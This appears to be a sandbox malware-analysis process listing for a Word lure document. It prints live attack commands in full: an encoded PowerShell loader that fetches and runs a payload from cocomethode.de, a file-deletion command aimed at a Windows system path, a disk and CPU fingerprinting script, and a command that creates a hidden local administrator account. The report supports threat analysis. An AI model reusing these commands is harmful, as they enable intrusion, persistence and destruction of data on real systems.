Show Windows behavior

Target ID:	10
Start time:	06:29:08
Start date:	11/12/2024
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\JD-Meta-Ads-Manager.pdf.docx" /o ""
Imagebase:	0x7ff6c1860000
File size:	1'635'104 bytes
MD5 hash:	E7F3B8EA1B06F46176FC5C35307727D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:29:08
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJABiAHkAdABlAEEAcgByAGEAeQBbACQAaQBdACAAPQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEAOwAgAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBBAHIAcgBhAHkAKQApADsADQAKAAkACQBiAHIAZQBhAGsAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAUwBlAG4AZAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsADQAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA==
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:29:08
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:29:08
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJABiAHkAdABlAEEAcgByAGEAeQBbACQAaQBdACAAPQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEAOwAgAH0ADQAKAAkACQBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBBAHIAcgBhAHkAKQApADsADQAKAAkACQBiAHIAZQBhAGsAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAUwBlAG4AZAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7AA0ACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsADQAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA==
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:29:08
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:29:11
Start date:	11/12/2024
Path:	C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sppsvc.exe
Imagebase:	0x7ff622df0000
File size:	4'629'328 bytes
MD5 hash:	30C7EF47B57367CC546173BB4BB2BB04
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:29:39
Start date:	11/12/2024
Path:	C:\Windows\Temp\svczHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Temp\svczHost.exe cakoi10 cocomethode.de
Imagebase:	0x7ff799300000
File size:	8'357'376 bytes
MD5 hash:	9298A0077E8353244A38CAEFE43AF4CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc query myRdpService
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc query myRdpService
Imagebase:	0x7ff6c5d50000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:29:40
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:30:10
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc query myRdpService
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6428, Parent PID: 4292

General

Target ID:	31
Start time:	06:30:10
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	06:30:10
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc query myRdpService
Imagebase:	0x7ff6c5d50000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:30:10
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc stop "myRdpService"
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:30:10
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:30:10
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop "myRdpService"
Imagebase:	0x7ff6c5d50000
File size:	72'192 bytes
